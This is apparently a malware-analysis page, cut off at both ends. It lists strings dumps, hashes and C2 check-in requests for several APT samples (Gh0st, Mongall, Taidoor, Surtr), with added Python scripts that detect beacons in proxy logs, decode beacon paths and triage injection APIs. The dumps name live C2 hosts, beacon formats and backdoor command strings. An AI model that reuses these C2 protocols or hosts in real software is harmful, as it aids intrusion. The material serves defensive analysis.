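    "VirtualAllocEx", "OpenProcess", "CreateRemoteThread", "Module32Next",
    "Module32First", "CreateToolhelp32Snapshot", "GetTempPathA",
]

# technique -> (imports that must all be present, substrings of which any must match)
RULES = {
    "remote-thread injection":
        ({"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}, ()),
    "process hollowing / thread hijack":
        ({"CreateProcessA", "GetThreadContext", "VirtualAllocEx",
          "WriteProcessMemory", "ResumeThread"}, ()),
    "manual PE mapping":
        ({"VirtualAlloc", "VirtualProtect", "LoadLibraryA", "GetProcAddress"}, ()),
    "AV product path lookup":
        (set(), ("SOFTWARE\\KasperskyLab", "SOFTWARE\\TrendMicro")),
}


def triage(strings):
    """Return fully matched techniques plus partial API-set matches with what is missing."""
    present = set(strings)
    matched, partial = [], {}
    for name, (apis, needles) in RULES.items():
        missing = apis - present
        needle_hit = not needles or any(n in s for s in strings for n in needles)
        if not missing and needle_hit:
            matched.append(name)
        elif apis and len(missing) < len(apis):
            # part of the set is visible; the rest may be resolved via GetProcAddress
            partial[name] = sorted(missing)
    return {"matched": matched, "partial": partial}


if __name__ == "__main__":
    for label, strs in (("Vidgrab", VIDGRAB_STRINGS), ("Gh0st hgif", GHOST_STRINGS)):
        print(label, triage(strs))
```

Treat the output as a reading list, not a verdict. Both samples import GetProcAddress, so anything resolved at runtime (SetThreadContext, for instance, which the Vidgrab dump never shows) is invisible here, and the large encoded blobs in the Vidgrab dump hide the rest of the payload entirely; the partial matches are exactly the places to look next in a debugger.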


Gh0st hgif strings - APT

File: DW20.exe
MD5:  5d2a996e66369c93f9e0bdade6ac5299
Size: 102400

C2 checkin
GET /h.gif?pid =113&v=130586214568 HTTP/1.1
Accept: */*
Accept-Language: en-us
Pragma: no-cache
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)
Connection: Keep-Alive
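Two details of that request are hard-coded in the binary (the same lines appear in the strings below) and never occur in browser traffic: a space before the equals sign in "pid =113", and no space between "Mozilla/4.0" and "(compatible". Together with the C2 host from the strings they make a cheap proxy-log detection. The script below is an added example, not part of the original post; the log format and the log lines are constructed for the demo, the indicators are taken verbatim from this page.

```python
import re

# Added example, not part of the original post: flag the hgif beacon in
# proxy logs. HGIF_UA and the path shape are copied from the request above;
# the C2 host is the one in the sample's strings. SAMPLE_LOG is constructed.
HGIF_UA = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
HGIF_PATH = re.compile(r"^/h\.gif\?pid =\d+&v=\d+$")
KNOWN_C2 = {"godson355.vicp.cc"}

# constructed proxy log, tab separated: time, client, host, method, path, user-agent
SAMPLE_LOG = "\n".join([
    "2013-06-21T10:00:01\t10.0.0.5\twww.example.com\tGET\t/index.html\t"
    "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0",
    "2013-06-21T10:00:02\t10.0.0.7\tgodson355.vicp.cc\tGET\t/h.gif?pid =113&v=130586214568\t"
    "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)",
    "2013-06-21T10:00:03\t10.0.0.9\tcdn.example.net\tGET\t/h.gif?pid=113&v=1\t"
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "2013-06-21T10:00:04\t10.0.0.7\tgodson355.vicp.cc\tGET\t/h.gif?pid =113&v=130586214999\t"
    "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)",
])


def classify(host, path, ua):
    """Return the indicator names this request trips, in a fixed order."""
    reasons = []
    if HGIF_PATH.match(path):
        reasons.append("hgif-path")
    if ua == HGIF_UA:
        reasons.append("hgif-ua")
    if host.lower() in KNOWN_C2:
        reasons.append("known-c2-host")
    return reasons


def scan(log_text):
    """Run classify() over every log line and collect the hits."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, host, method, path, ua = line.split("\t", 5)
        reasons = classify(host, path, ua)
        if reasons:
            hits.append({"time": ts, "client": client, "host": host, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The third constructed line is a real-looking tracking pixel with a well-formed "pid=" and a well-formed User-Agent; it trips nothing, which is the point of matching the malformed variants exactly rather than "h.gif" alone. The path and UA indicators stand on their own when the operator moves to a new dynamic-DNS host.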

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Richi}
.text
`.rdata
@.data
h@A@
Rh P@
hPA@
h,P@
tUhT
h9P@
Ph\A@
hlA@
PPhR
h9P@
%(@@
%,@@
%0@@
% A@
hSVW
>"u:F
XPVSS
;x4u
ole32.dll
CoUninitialize
CoCreateInstance
CoInitialize
CloseHandle
VirtualFreeEx
WaitForSingleObject
LoadLibraryA
GetProcAddress
GetModuleHandleA
WriteProcessMemory
VirtualAllocEx
OpenProcess
CreateRemoteThread
Module32Next
Module32First
CreateToolhelp32Snapshot
GetLastError
WriteFile
SetFilePointer
GetFileSize
CreateFileA
GetModuleFileNameA
GetLongPathNameA
GetTempPathA
Sleep
FreeLibrary
lstrcatA
FindClose
FindNextFileA
FindFirstFileA
GetWindowsDirectoryA
GetShortPathNameA
MultiByteToWideChar
GetSystemInfo
KERNEL32.dll
SHGetPathFromIDListA
SHGetSpecialFolderLocation
SHELL32.dll
strlen
xcept_handler3
strcmp
sprintf
memset
strncpy
_stricmp
MSVCRT.dll
__dllonexit
_onexit
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z
??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z
?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A
?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z
??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z
??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z
MSVCP60.dll
GetStartupInfoA
LocalAlloc
InterlockedExchange
RaiseException
Kernel32
FreeLibrary
!This program cannot be run in DOS mode.
Rich
.text
-----------------snip
_^[]
;x4u
QRhp=
QRhl=
@HTTP/1.0 200 OK
Content-type:text/html
Content-length:0
USER32.dll
ADVAPI32.dll
SHELL32.dll
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
 inflate 1.1.4 Copyright 1995-2002 Mark Adler
WS2_32.dll
WININET.dll
PSAPI.DLL
WTSAPI32.dll
wsprintfA
CharNextA
ExitWindowsEx
GetWindowThreadProcessId
IsWindowVisible
GetWindowTextA
EnumWindows
CloseDesktop
SetThreadDesktop
OpenInputDesktop
GetUserObjectInformationA
GetThreadDesktop
OpenDesktopA
PostMessageA
IsValidSid
LookupAccountNameA
LsaClose
LsaRetrievePrivateData
LsaOpenPolicy
LsaFreeMemory
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
LookupAccountSidA
GetTokenInformation
SHGetSpecialFolderPathA
SHGetFileInfoA
SHGetPathFromIDListA
SHGetSpecialFolderLocation
ShellExecuteA
WSAIoctl
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
GetModuleFileNameExA
EnumProcessModules
WTSFreeMemory
WTSQuerySessionInformationA
InitializeCriticalSection
DeleteCriticalSection
VirtualFree
LeaveCriticalSection
EnterCriticalSection
Sleep
VirtualAlloc
CreateEventA
CloseHandle
WaitForSingleObject
ResetEvent
SetEvent
InterlockedExchange
CancelIo
lstrlenA
FreeLibrary
GetProcAddress
LoadLibraryA
GetVersionExA
GetTickCount
WriteFile
SetFilePointer
GetLastError
CreateProcessA
FindClose
LocalFree
LocalReAlloc
LocalAlloc
RemoveDirectoryA
OpenProcess
GetShortPathNameA
DeleteFileA
GetTempPathA
GetCurrentProcess
OutputDebugStringA
GetSystemDirectoryA
DisconnectNamedPipe
ReadFile
PeekNamedPipe
WaitForMultipleObjects
GetSystemDefaultUILanguage
ReleaseMutex
SetErrorMode
CreateThread
GetLocalTime
GetCurrentThreadId
KERNEL32.dll
??3@YAXPAX@Z
memmove
ceil
_ftol
__CxxFrameHandler
??2@YAPAXI@Z
_CxxThrowException
sprintf
free
_except_handler3
strtok
_beginthreadex
calloc
MSVCRT.dll
??1type_info@@UAE@XZ
_initterm
malloc
_adjust_fdiv
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
?_C@?1??_Nullstr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@CAPBDXZ@4DB
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
?_Xran@std@@YAXXZ
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
?_Xlen@std@@YAXXZ
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z
MSVCP60.dll
RaiseException
Serverz.dll
Connection: Keep-Alive
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)
Pragma: no-cache
Accept-Language: en-us
Accept: */*
GET /h.gif?pid =113&v=130586214568 HTTP/1.1
.PAX
.PAD
bad Allocate
bad buffer
%s\*.*
%s\%s
%s%s%s
%s%s*.*
KBDMGR.EXE
%skbdmgr.lnk
%skbdmgr.exe
C_RUN_PLUG_COMMAND_FILELIST_DRIVE
C_RUN_PLUG_COMMAND_SCREEN_SPY
C_RUN_PLUG_COMMAND_SHELL
C_ONLINE_ACTIVE
LCommend::RemoveServer
LCommend::Messgae
LCommend::LogoOff
LCommend::PowerReset
LCommend::PowerOff()
LCommend::Update
LCommend::OpenIE
SeShutdownPrivilege
open
iexplore.exe
 Update
wininet.dll
urlmon.dll
\cmd.exe
7.25 host
godson355.vicp.cc
%s:%d|%s %s|%s|%s|%s
%ug %um
%u GB
%u MB
GlobalMemoryStatusEx
ProcessorNameString
HARDWARE\DESCRIPTION\System\CentralProcessor\0
%s SP%d
2008
Vista
2003
2000
memcpy
malloc
strchr
msvcrt.dll
SetUnhandledExceptionFilter
GetLocalTime
LeaveCriticalSection
lstrcmpiA
lstrlenA
lstrcmpA
lstrcpyA
lstrcatA
GetTempPathA
CreateFileA
FindFirstFileA
FindNextFileA
MoveFileA
DeleteFileA
GetLogicalDriveStringsA
GetFileAttributesA
GetDriveTypeA
GetWindowsDirectoryA
CreateDirectoryA
GetModuleFileNameA
GetVolumeInformationA
OpenEventA
CreatePipe
GetFileSize
GetDiskFreeSpaceExA
GetPrivateProfileSectionNamesA
LocalFree
ReadFile
OpenProcess
Process32Next
Process32First
GetStartupInfoA
run error
My WorkSpace %d
m4qtrsz5bfn3o1g
1.1.4
need dictionary
incorrect data check
incorrect header check
invalid window size
unknown compression method
invalid bit length repeat
too many length or distance symbols
invalid stored block lengths
invalid block type
incompatible version
buffer error
insufficient memory
data error
stream error
file error
stream end
invalid distance code
invalid literal/length code
incomplete dynamic bit lengths tree
oversubscribed dynamic bit lengths tree
incomplete literal/length tree
oversubscribed literal/length tree
empty distance tree with lengths
incomplete distance tree
oversubscribed distance tree
.?AVtype_info@@
041b1|1
5J5{5
5c6u6
6F7a7
7;8N8W8`8v8
9H9Z9
9(:b:x:
=,=E=\=
>#?R?c?
516A6S6c6s6}6
6"7(7D9{9
:f;.<
1M2b2l2}2
4"4`4
575D5Z5
586l7x7
:.:;:d:q:
;#;5;?;
<K<`<
< =F=p=
>6?U?
40e1
2%2<2
3:6L6
:T;k;
;5<M<V=#>F>w>
?/?M?V?
0S0b0
2F3q3w3&4T4e4t4z4
5#5`5t5@6^6}6
6Z7o7
858<8I8W8^8
:;:d:
#0*0/0`0
1W1v1
2\2`2d2h2l2p2t2x2|2
3(3>3E3R3Z3~3
4-4\4a4i4
5.5K5
5;6]6
7,7R7
728r8}8
:2:N:}:
:0;D;T;d;t;
=.=;=H=U=b=o=|=
=>>j>
>:?I?X?
0'0C0_0{0
1<1I1V1
2"3/3R3_3
4B4O4r4
525?5b5o5
6,6L6Y6q6~6
9%9*9/999>9C9M9R9`9e9j9t9y9~9
:(:-:2:<:A:F:P:U:Z:d:i:n:x:}:
;#;(;-;7;<;A;K;P;U;_;d;i;s;x;
<#<-<F<m<s<y<
=">Q>
?@?m?z?
0N0u0
14191C1K1R1v1
192M2[2m2w2
3-3T3h3r3
4#4*454<4G4N4Y4`4k4r4|4
5"5-545?5F5Q5X5c5j5u5|5
8H8W8
<(=,=0=4=8=<=@=D=H=L=P=T=X=\=
v0I1m1
2e4q4
3u5z5f<%?
7]8l8
:#:l:
;!;3;9;
<<=q=
R0b0h0
0R1Z1`1k1x1
3&3-383?3J3Q3\3c3n3u3
5(5-5
6&656<6G6N6X6g6n6y6
7&7L7e7k7
8*8J8h8u8{8
1P2\2h2t2
2T?X?
0(0D0L0T0\0d0
1 1<1D1P1l1t1
2(2D2L2X2t2
3$303L3X3t3
4$4(4,40444D4H4L4P4T4d4h4l4p4t4
5 5$5(5,50545<5@5H5L5P5T5X5`5d5h5l5p5t5x5|5
9X:\:p:t:
=0=4=8=<=@=D=H=L=P=T=X=\=`=d=l=p=x=|=
Storm ddos Server
Welcome to use storm ddos
Thank you
asdfgh
CreateMutexA
SetFileAttributesA
Process32First
Process32Next
CreateProcessA
WuSh B- Is Running!
CreateThread
GetEnvironmentVariableA
 /c
del "

Unicode Strings:
---------------------------------------------------------------------------
jjjjjjj
jjjjjj
jjjjj
jjjjjj
jjjj
jjjj
VS_VERSION_INFO
StringFileInfo
040904b0
Comments
CompanyName
FileDescription
Device Protect Application
FileVersion
3, 9, 0, 0
InternalName
Microsoft(R) Windows(R) Operating System
LegalCopyright
Copyright ? 2013
LegalTrademarks
OriginalFilename
OriginalFileqqqq
csdf.dll
PrivateBuild
ProductName
ProductVersion
3, 9, 0, 0
SpecialBuild
VarFileInfo
Translation

Mongall strings - APT

File: DW20.exe
MD5:  d7dd5cda909190c6c03db5e7f8afd721
Size: 24576

C2 checkin
GET /3000FC08000024FE0700363635353544304331303530313136300052656D6F746520504300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070161646D696E000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.ndbssh.com:5331
Cache-Control: no-cache:
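The request path is not random: the sample's format string "http://%s:%d/%d%s" (in the strings below) builds it from a decimal number followed by a hex-encoded blob, and the %08x and %s%s format strings next to GetVolumeInformationA, GetComputerNameA and GetUserNameA say what the blob carries. Because the decimal and hex parts are not delimited, the byte boundary has to be found by trying both nibble alignments. The decoder below is an added example, not the sample's or the post's code; it assumes the request line was captured intact.

```python
import re

# Added example, not the page's own code. Per the sample's format string
# "http://%s:%d/%d%s", the path is a decimal counter run straight into a hex
# blob; decode at both nibble alignments and keep the one that yields more
# text. REQUEST_LINE is copied from the capture above and assumed intact.
REQUEST_LINE = (
    "GET /3000FC08000024FE0700363635353544304331303530313136300052656D6F746520504300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070161646D696E000000000000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1"
)

PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")


def carve(raw):
    """Printable ASCII runs of four or more bytes, like strings(1)."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(raw)]


def decode_path(path):
    """Hex-decode the path body at both nibble alignments; return the better one."""
    body = path.lstrip("/")
    best = {"alignment": None, "score": -1, "strings": [], "raw": b""}
    for start in (0, 1):
        hexpart = body[start:]
        hexpart = hexpart[: len(hexpart) - len(hexpart) % 2]   # even length for fromhex
        try:
            raw = bytes.fromhex(hexpart)
        except ValueError:
            continue
        found = carve(raw)
        score = sum(len(s) for s in found)                     # more text = right alignment
        if score > best["score"]:
            best = {"alignment": start, "score": score, "strings": found, "raw": raw}
    return best


def beacon_fields(request_line):
    """Pull the path out of an HTTP request line and decode it."""
    _method, path, _version = request_line.split(" ")
    return decode_path(path)


if __name__ == "__main__":
    result = beacon_fields(REQUEST_LINE)
    print(result["alignment"], result["strings"])
```

At the correct alignment the blob yields a 16-hex-digit host id, the computer name "Remote PC" and the user name "admin", each NUL-terminated and padded with zeros to a fixed-size field; the misaligned decode produces only short junk runs, which is why the score picks the right one without knowing how many digits the counter had. The victim fingerprint travels in cleartext in a GET path, so it is recoverable from any proxy log that kept full URLs.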

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich)
.text
`.rdata
@.data
Shared
T$@h
PWVS
_^]3
=TH@
SUV3
WSSSSh
SSPU
_^]3
L<$G
D$$j:P
_^][
_^]3
SUVW
_^][
_^][
t$pV
PjIj
D$ d
QjJj
It$RU
hlA@
L$$PQj
D$ P
u$hTA@
_^]3
=$0@
D$DP
D$(?
D$$$
SPSSh
T$pj
T$lQR
_^][
_^][
_^][
_^][
_^][
=tH@
hpH@
htH@
 SVW
5\H@
%x0@
CopyFileA
GetSystemDirectoryA
GetModuleFileNameA
LoadLibraryA
Sleep
CloseHandle
SetEvent
OpenEventA
WaitForSingleObject
GetProcAddress
FreeLibrary
CreateEventA
ExitProcess
GetVolumeInformationA
GetComputerNameA
GlobalMemoryStatus
GetSystemInfo
GetVersionExA
GetVersion
KERNEL32.dll
USER32.dll
RegCloseKey
RegSetValueExA
RegOpenKeyA
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
ADVAPI32.dll
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
InternetSetOptionA
WININET.dll
??3@YAXPAX@Z
??2@YAPAXI@Z
strchr
atoi
malloc
printf
sprintf
_beginthreadex
free
strrchr
__dllonexit
_onexit
MSVCRT.dll
_exit
_XcptFilter
exit
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
AVICAP32.dll
www.ndbssh.com
\netbridge.exe
msnetshare
%systemroot%\netbridge.exe
Software\Microsoft\Windows\CurrentVersion\Run
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
update exe file false
http://%s:%d/%d%s
ProcessTrans
~MHz
Hardware\Description\System\CentralProcessor\0
%08x
%s%s

Unicode Strings:
---------------------------------------------------------------------------
jjjj

Taidoor strings - APT

File: DW20.exe
MD5:  46ef9b0f1419e26f2f37d9d3495c499f
Size: 47104

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
ARich
.text
`.rdata
@.data
.rsrc
_^][
QSUWh
D$ C;
^_][Y
l$@VWPQU
_^][
_^][
h P@
_^][
_^][
_^][
_^][
_^][
SUVW
-d@@
><\u
D$ s
D$!t
--------------snip
_^][
WPRU
_^]3
_^]3
%|@@
h@A@
hSVW
>"u:F
XPVSS
MFC42.DLL
printf
fclose
fopen
fwrite
rand
__p___argv
__p___argc
__CxxFrameHandler
_CxxThrowException
putc
getc
fread
realloc
__dllonexit
_onexit
MSVCRT.dll
??1type_info@@UAE@XZ
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
OutputDebugStringA
LockResource
GetProcAddress
GetModuleHandleA
SizeofResource
FindResourceA
lstrcpyA
lstrlenA
lstrcatA
CloseHandle
CreateProcessA
GetTickCount
CopyFileA
lstrcmpiA
GetLongPathNameA
ExpandEnvironmentStringsA
GetModuleFileNameA
DeleteFileA
Sleep
VirtualAlloc
VirtualProtect
VirtualFree
IsBadReadPtr
HeapAlloc
GetProcessHeap
GetStartupInfoA
KERNEL32.dll
wsprintfA
USER32.dll
CloseServiceHandle
EnumServicesStatusA
OpenSCManagerA
ADVAPI32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
StrChrA
PathRemoveFileSpecA
SHLWAPI.dll
_stricmp
Kernel32.dll
Start
IDR_BIN
%tmp%\
.exe
%tmp%
WinHttp
Read Error
.?AVtype_info@@
1PAD(
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING

Unicode Strings:
---------------------------------------------------------------------------
IDR_BIN
"-7v
------------------snip
h&About ...
About
System
Bypass Version 1.0
Copyright (C) 2013
Bypass
Hello World!
BYPASS

Surtr (Smoaler) strings - APT

File: DW20.dll
MD5:  8e187ae152c48099f715af442339c340
Size: 44032

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich
.text
`.rdata
@.data
.reloc
;ORD.
MessageBoxA
user32.dll
CloseHandle
CreateFileA
GetFileSize
GetModuleFileNameA
GetTempFileNameA
GetTempPathA
ReadFile
SetFilePointer
VirtualAlloc
WinExec
WriteFile
lstrlenA
kernel32.dll
mydll.dll
DoWork
0#010I0j0y0
1%1+171=1C1I1T1_1k1
!This program cannot be run in DOS mode.
Richw
.text
`.rdata
@.data
.rsrc
SVW3
)MYi62
HX-1
-'pY
l|A@
8HTd
&5I8
d)9&
Od-@q
Soft
ware
\Mic
roso
ft\W
indo
ws M
edia
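The eight consecutive four-character lines just above are one string, not eight: "Soft" "ware" "\Mic" "roso" "ft\W" "indo" "ws M" "edia" is the registry path Software\Microsoft\Windows Media pushed onto the stack one DWORD at a time, so it never exists contiguously in the file and strings(1) prints it as a column of fragments. The helper below is an added example, not from the original post, that rebuilds such strings from a strings dump; the excerpt it runs on is copied from the lines around those fragments.

```python
# Added example, not from the original post: rebuild a stack string that the
# loader assembles one DWORD at a time, which strings(1) prints as a column of
# 4-byte fragments. EXCERPT is copied from the dump around those fragments.
EXCERPT = """\
d)9&
Od-@q
Soft
ware
\\Mic
roso
ft\\W
indo
ws M
edia
t$ ;4
_^]3
Pj@h
"""


def reassemble_stack_strings(lines, width=4, min_parts=3):
    """Join runs of consecutive width-byte fragments into candidate strings.

    Runs shorter than min_parts are dropped: two adjacent 4-char lines of
    code bytes are common, eight in a row spelling a registry path are not.
    """
    found, run = [], []
    for line in list(lines) + [""]:          # sentinel flushes the last run
        if len(line) == width:
            run.append(line)
            continue
        if len(run) >= min_parts:
            found.append("".join(run))
        run = []
    return found


if __name__ == "__main__":
    for s in reassemble_stack_strings(EXCERPT.splitlines()):
        print(s)
```

Two caveats. The last DWORD of a stack string is usually partial (one to three bytes plus NUL padding) and falls below the strings minimum, so a recovered string may be missing its tail; "edia" happens to fill its DWORD exactly, so this one may still continue in the binary. And width=4 matches 32-bit code, where the compiler emits push imm32 or mov dword; on x64 builds try width=8. Confirm in a disassembler before putting the result in a report.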
t$ ;4
_^]3
Pj@h
h40@
h$0@
Dah$0@
h$0@
h$0@
h$0@
h$0@
Oh$0@
7tah@0@
hD0@
Pj@QV
5L1@
t"It
Iu'j
hh @
hSVW
>"u:F
XPVSS
%( @
%8 @
%P @
%T @
VirtualProtect
KERNEL32.dll
strncpy
fclose
fread
ftell
fseek
fopen
fwrite
MSVCRT.dll
_exit
_XcptFilter
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
GetModuleHandleA
GetStartupInfoA
advapi32.dll
kernel32.dll
ntdll.dll
h6WW
>t:$
ut@$p(
(uPV
D1$c
U?(p
hvg
^w$L
UO$EdP
u7$d
Q]y(
YQA+;h
zu+$
stf(W
wwwwwwwwwwwwww
wwwwwwwwwwwwww
DDDDDDDDD@
DDDDDDDDDGpw
DDDDDDDDDGpw
DDDDDDDDDDDDDD
wwwwwwwwwwwwww
This
proggam
DO~S
mode.
iS0R
chDH(
P@EL8
rdatP
.'(Le)
P`relo
5lp(L
t9"I
\$l;
Q8RP
()jT@+h
FV2PSR
VUoW%
`!3\
C@go6;
QVhU<
AsAnG#
-140p
F<iECE
QQ1P5^
xtcR
B8*Xs,
9MZu}:
vd'Q
v=bO
PL&CT$
QHxp
 {I;P
+Q$@
$tF#
 FYE
H.Pt
JPXQU
65h!
ZSWV
yUq3
K/2g
"j@A
15*W Q
EPS4
r4U @x
|diLT
Q},\&
bB0d#
s)j!P
E <B)L_
&dS
e2h^
PKzt
kJd\
mWB&
T$_7
VZ2|
`JB.mX%
*9WE
T^^h
zB!d
fEqK,
16OPT"!<%
>a9H
PVQR
/2qVj(
@Q|&
tNv^
8,Du
QSeW
&6Ad
v*:(A
j(@!
fqhx
t!hy
Au)I
Z_L[
'*jU
'Lw!
h8B#|
"GDt
)TSh
fp!8=
tU8<A
TpT!
'2x%P
WuST
K:jrg
jd,H
$Whq
UNH e %
szJlJ E
?uI3$
JR"[!jc
"-$j
LJO_"
qCZ@
C! y
(=KP
/Wfx
D?0h
fgXD1`X
-@b$
B,"~
B4#O
z{2%18
<"#0
dDAb
LG@X
bx10X
?B!|
B0!$
o{)-o<Q
Fxw@
["_,eRVUe
tB*d
n6.O
_[mz
cDPp
U~PN
4WP}
$h)g?
 &E4+
{-Yo
zb8H
!8!X
ASk)
Xo!m
J"8M
FI!HF!
VL{ RBlf
Xkm@
Y2N^
eQg\
(OU
 ;JD
F&m,
SK<Kck
(/dU2<
W~%dNS
VQ$S9b
%+GJ(
!]_K
%#,4
*pX
q5*#
s$bP->
$+bt|
+3!8
SRR>h
WJ- -
U>Bq'
nC7@
[+VU
Y9M]
.R?[
kLvN^H
QqSkR
u.Wh
ko-A (
47tF
eCQT
(fWU(
&Rh!
A-,0
C'/4*!"
x_tT
SWQ8F!
PywN
tK9a
=JR@
EVW/
<X(F
1XRP
t/WS+
jEL#
G0#(
-_tf
tM%VP
-b'Q^
1YK.
Df!gI
(ch-
l<#uZ?$U
0V8Y
17WP(
<DL)
"):DBJ
xP?1
X (
6(8Cr
ginthr
}3v*
2@Y9AP
FraDH
ndvl
SVCRT.d
USER3R2^8
a5ACP
r(tu
vPgo
bNjL4
icm>
Q(&QI
8ed8
u`@$p(_
U?(p
hvg
UO$EdP
a<ppA
u7$vd
Q]y(
<JQL
8^8X8?Q
u+;$
(m3C
stf(W
Y3p8
Ke9rn
Aibr
%s #
SoftwZ
e\Mico
Cur0
0E=xp|
X),U
9cS=C{<vd
CxrPR
 aCvVp
rqwf
n:(z
TA~~i
4 HdCvxt
/v-Y
_CUR
U7\(
=sSA
H5S"
tg$m
Zb)D
3Lkn~)
Q:|(yV
4h&d@
/=B&cS
orTB44i
ToM$ul
!3tPkc
FHilXUu
(x86)\I
SysWO
s0thm
\1Li
2$BaxnD
1232.
VP|N]LMyc0
$XC.+
PADCINGX
&3r-tEvLx
 ;r&tGvdx
=1'BGQg`
{95o:v
75NB
:r,tSv
v!x1zH|N~Y~e~u~
71f'{G
3rJtyv
6r7tVv
v"x3
L+OxzA|F~W~\~m~r~
=#>0?7?<?H?M?R?^?c?h?t?y?~?
,O8>
"910:9}
92E:
3BNR
#5r*t9vXxzz
tBvLxfzx|
Pt\v
4P B
> ?$*(
~0~4~8~<~@~DX
t)v6xOz_|
T1mN
L7VN
9i9;
T=zN
4!5T
)%:1
qv4,
x0|'
,4!<=D*L
~t~|M
freL19
jkub
!Wv8
lu~(
wwwwwwwwwwwwww
wwwwwwwwwwwwww
DDDDDDDDD@
DDDDDDDDDGpw
DDDDDDDDDGpw
DDDDDDDDDDDDDD
wwwwwwwwwwwwww

Unicode Strings:
---------------------------------------------------------------------------
Ef77

TBD 8202 strings - APT

=================================================
File: DW20.dll
MD5:  064ae9b451f0503982842c9f41a58053
